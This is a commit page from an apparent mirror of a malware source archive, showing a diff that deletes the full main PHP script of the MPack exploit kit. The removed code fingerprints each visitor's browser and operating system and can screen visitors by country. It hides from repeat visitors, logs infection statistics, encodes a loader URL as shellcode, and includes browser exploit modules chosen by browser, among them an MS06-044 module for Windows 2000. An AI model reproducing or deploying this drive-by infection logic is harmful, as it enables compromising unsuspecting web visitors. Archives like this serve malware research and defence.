mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-02-22 06:33:40 +00:00
Delete HackTool.PHP.Mphak.e
This commit is contained in:
vxunderground
GitHub
parent
d320ee005c
commit
4b52f61494
@ -1,236 +0,0 @@
|
||||
<?
|
||||
|
||||
// MPack main script
|
||||
|
||||
// .CONFIG
|
||||
include ('settings.php'); //global settings
|
||||
|
||||
|
||||
|
||||
// .CODE
|
||||
include ('cryptor.php'); //crypting module
|
||||
|
||||
function detect_browser($HTTP_USER_AGENT) {
|
||||
// Áðàóçåð è åãî âåðñèÿ
|
||||
if (eregi("(opera) ([0-9]{1,2}.[0-9]{1,3}){0,1}", $HTTP_USER_AGENT, $match) || eregi("(opera/)([0-9]{1,2}.[0-9]{1,3}){0,1}", $HTTP_USER_AGENT, $match)) {
|
||||
$browser[name] = "Opera";
|
||||
$browser[version] = $match[2];
|
||||
}
|
||||
elseif (eregi("(konqueror)/([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
|
||||
$browser[name] = "Konqueror";
|
||||
$browser[version] = $match[2];
|
||||
}
|
||||
elseif (eregi("(lynx)/([0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2})", $HTTP_USER_AGENT, $match)) {
|
||||
$browser[name] = "Lynx";
|
||||
$browser[version] = $match[2];
|
||||
}
|
||||
elseif (eregi("(links) \(([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
|
||||
$browser[name] = "Links";
|
||||
$browser[version] = $match[2];
|
||||
}
|
||||
elseif (eregi("(msie) ([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
|
||||
$browser[name] = "MSIE";
|
||||
$browser[version] = $match[2];
|
||||
}
|
||||
elseif (eregi("(netscape6)/(6.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
|
||||
$browser[name] = "Netscape";
|
||||
$browser[version] = $match[2];
|
||||
}
|
||||
elseif (eregi("(mozilla)/([0-9]{1,2}.[0-9]{1,3})", $HTTP_USER_AGENT, $match)) {
|
||||
$browser[name] = "Netscape(mozilla)";
|
||||
$browser[version] = $match[2];
|
||||
if (eregi("(firefox)/([0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2})", $HTTP_USER_AGENT, $match)) {
|
||||
$browser[name] = "Firefox";
|
||||
$browser[version] = $match[2];}
|
||||
|
||||
|
||||
}
|
||||
else {
|
||||
$browser[name] = "Unknown";
|
||||
$browser[version] = "Unknown";
|
||||
}
|
||||
|
||||
// OS
|
||||
if (eregi("linux", $HTTP_USER_AGENT)) $browser[os] = "Linux";
|
||||
elseif (eregi("win32", $HTTP_USER_AGENT)) $browser[os] = "Windows";
|
||||
elseif ((eregi("(win)([0-9]{2})", $HTTP_USER_AGENT, $match)) || (eregi("(windows) ([0-9]{2})", $HTTP_USER_AGENT, $match))) $browser[os] = "Windows ".$match[2];
|
||||
elseif (eregi("(winnt)([0-9]{1,2}.[0-9]{1,2}){0,1}", $HTTP_USER_AGENT, $match)) $browser[os] = "Windows NT ".$match[2];
|
||||
elseif (eregi("(windows nt)( ){0,1}([0-9]{1,2}.[0-9]{1,2}){0,1}", $HTTP_USER_AGENT, $match)) $browser[os] = "Windows NT ".$match[3];
|
||||
elseif (eregi("mac", $HTTP_USER_AGENT)) $browser[os] = "Macintosh";
|
||||
elseif (eregi("freebsd", $HTTP_USER_AGENT)) $browser[os] = "FreeBSD";
|
||||
else $browser[os] = "Unknown";
|
||||
if (eregi("(sv1)", $HTTP_USER_AGENT)) $browser[os] = "Windows NT 5.1 SP2";
|
||||
|
||||
return $browser;
|
||||
}
|
||||
|
||||
|
||||
|
||||
function uEncode($s) //encodes url into shellcode
|
||||
{
|
||||
$res=strtoupper(bin2hex($s));
|
||||
$g = round(strlen($res)/4);
|
||||
if ($g != (strlen($res)/4)) { $res.="00"; }
|
||||
$out = "";
|
||||
|
||||
for ($i=0; $i<strlen($res); $i+=4) {
|
||||
$out.="%u".substr($res, $i+2, 2).substr($res, $i, 2);
|
||||
}
|
||||
return $out;
|
||||
}
|
||||
|
||||
|
||||
//checks current country with a list
|
||||
//terminate if not in the list
|
||||
function CheckCountry()
|
||||
{
|
||||
global $CoutryList;
|
||||
$cci=GetCountryInfo(getenv("REMOTE_ADDR"));
|
||||
if (strpos(strtoupper($CoutryList), $cci['a2'])==FALSE) {
|
||||
//coutry not in the list
|
||||
echo "^_^";
|
||||
exit;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
//checks and saves user's IP hashed with browser
|
||||
//to avoid future browser's hangup
|
||||
function CheckAddUser()
|
||||
{
|
||||
global $UseMySQL;
|
||||
global $dbstats;
|
||||
|
||||
$ipua=md5(getenv("REMOTE_ADDR").getenv("HTTP_USER_AGENT"));
|
||||
|
||||
if ($UseMySQL==0) {
|
||||
//text variant
|
||||
$fn="users.txt";
|
||||
if (file_exists($fn)) {
|
||||
$lines = file($fn);
|
||||
if (in_array($ipua."\n", $lines)==TRUE) {
|
||||
//got dup
|
||||
echo ";[";
|
||||
exit;
|
||||
}
|
||||
}
|
||||
|
||||
//uniq record
|
||||
$fp=fopen($fn,"a");
|
||||
fwrite($fp,$ipua."\n");
|
||||
fclose($fp);
|
||||
} else {
|
||||
|
||||
//mysql variant
|
||||
$query = "SELECT * FROM ".$dbstats."_users WHERE data='".$ipua."'";
|
||||
$res=mysql_query($query);
|
||||
$merr=mysql_error();
|
||||
if ($merr!="") {
|
||||
//looks like no table, create & add data
|
||||
$query="CREATE TABLE `".$dbstats."_users` (`data` VARCHAR( 32 ) NOT NULL ) ENGINE = MYISAM ;";
|
||||
mysql_query($query);
|
||||
$query = "INSERT INTO ".$dbstats."_users VALUES ('".$ipua."')";
|
||||
mysql_query($query);
|
||||
|
||||
} else {
|
||||
//table found, check returned set count
|
||||
$rcount=@mysql_num_rows($res);
|
||||
if ($rcount>0) {
|
||||
//found data, prevent view
|
||||
echo ":[";
|
||||
exit;
|
||||
} else {
|
||||
//not found, add
|
||||
$query = "INSERT INTO ".$dbstats."_users VALUES ('".$ipua."')";
|
||||
mysql_query($query);
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
// Windows NT 5.0 = Win2000
|
||||
// Windows NT 5.1 = WinXP sp0,1
|
||||
// Windows NT 5.1 SP2 = WinXP sp2 (Windows NT 5.1; SV1) under IE
|
||||
// Windows NT 5.2 = Win2003 build 164/16.6
|
||||
$browser = detect_browser(getenv("HTTP_USER_AGENT"));
|
||||
|
||||
|
||||
if ($OnlyDefiniedCoutries==1) { CheckCountry(); }
|
||||
|
||||
|
||||
if ($BlockDuplicates==1) { CheckAddUser(); }
|
||||
|
||||
AddIP("all");
|
||||
if ($UseMySQL==1) { //geo2ip stat on traff
|
||||
$id="traff";
|
||||
$cci=GetCountryInfo(getenv("REMOTE_ADDR"));
|
||||
//increase hits to this country
|
||||
$query = "UPDATE ".$dbstats." SET count = count + 1 WHERE a2 = '".$cci['a2']."' AND statid = '".$id."'";
|
||||
$r = mysql_query($query);
|
||||
if (mysql_affected_rows() == 0)
|
||||
{
|
||||
$query = "INSERT INTO ".$dbstats." VALUES ('".$id."', '".$cci['a2']."', '".$cci['name']."', 1)";
|
||||
mysql_query($query);
|
||||
}
|
||||
|
||||
//browser-type count
|
||||
$query = "UPDATE ".$dbstats."_brs SET count = count + 1 WHERE browser = '".$browser[name]."'";
|
||||
$r = mysql_query($query);
|
||||
if (mysql_affected_rows() == 0)
|
||||
{
|
||||
$query = "INSERT INTO ".$dbstats."_brs VALUES ('".$browser[name]."', 1)";
|
||||
mysql_query($query);
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
if ($CountReferers==1) { //referer count
|
||||
$ref="_".substr(@mysql_real_escape_string(getenv("HTTP_REFERER")),0,100);
|
||||
$query = "UPDATE ".$dbstats."_refs SET count = count + 1 WHERE referer = '".$ref."'";
|
||||
$r = mysql_query($query);
|
||||
if (mysql_affected_rows() == 0)
|
||||
{
|
||||
$query = "INSERT INTO ".$dbstats."_refs VALUES ('".$ref."', 1)";
|
||||
mysql_query($query);
|
||||
}
|
||||
|
||||
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
//extended loader's subsystem
|
||||
if (isset($_GET['id'])) {
|
||||
$LoaderPath=$LoaderPath."?id=".$_GET['id'];
|
||||
}
|
||||
|
||||
|
||||
//exploits combination
|
||||
if ($browser[name]=="MSIE") {
|
||||
if ($browser[os]!="Windows NT 5.0") { AddIP("0day"); include 'crypt.php'; include 'megapack1.php'; }
|
||||
if ($browser[os]=="Windows NT 5.0") { AddIP("jar"); include 'ms06-044_w2k.php'; include 'megapack1.php'; }
|
||||
}
|
||||
|
||||
if ($browser[name]=="Firefox") { AddIP("firefox"); include 'ff.php'; }
|
||||
|
||||
if ($browser[name]=="Opera") {
|
||||
if (substr($browser[version], 0, 1)<"8") { AddIP("opera7"); include 'o7.php'; }
|
||||
}
|
||||
|
||||
|
||||
|
||||
//if ($browser[name]!="Opera") && ($browser[name]!="Firefox") && ($browser[name]!="MSIE") { include 'megapack1.php'; }
|
||||
|
||||
//echo getenv("HTTP_USER_AGENT")."<br>";
|
||||
//echo "Browser: ".$browser[name]."<br> Browser Ver: ".$browser[version]."<br>OS: ".$browser[os];
|
||||
|
||||
|
||||
?>
|
||||
Loading…
Reference in New Issue
Block a user